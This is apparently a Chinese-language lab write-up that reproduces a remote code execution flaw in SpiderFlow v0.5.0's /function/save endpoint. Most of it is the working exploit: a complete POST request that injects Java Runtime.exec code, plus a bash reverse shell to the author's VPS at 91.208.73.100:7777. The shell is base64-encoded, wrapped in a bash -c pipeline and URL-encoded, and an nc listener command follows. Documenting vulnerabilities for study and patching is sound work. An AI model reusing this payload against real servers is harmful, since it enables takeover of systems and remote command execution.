一、漏洞概述
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
二、影响范围
v0.5.0
三、访问页面
四、漏洞复现
1、访问/function/save,修改请求为post
POST http://eci-2ze1d1nv4k3rrnp2khbf.cloudeci1.ichunqiu.com:8088/function/save HTTP/1.1
Host: eci-2ze1d1nv4k3rrnp2khbf.cloudeci1.ichunqiu.com:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 386
id=&name=rce¶meter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%35%4d%53%34%79%4d%44%67%75%4e%7a%4d%75%4d%54%41%34%4c%7a%63%33%4e%7a%63%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d');{
payload:是我的VPS地址
bash -i >& /dev/tcp/91.208.73.100/7777 0>&1
进行base64编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC85MS4yMDguNzMuMTAwLzc3NzcgMD4mMQ==
构造成反弹连接
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC85MS4yMDguNzMuMTAwLzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}
再进行一次url编码
%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%35%4d%53%34%79%4d%44%67%75%4e%7a%4d%75%4d%54%41%34%4c%7a%63%33%4e%7a%63%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d
2、在自己的VPS服务器监听7777端口
nc -lvp 7777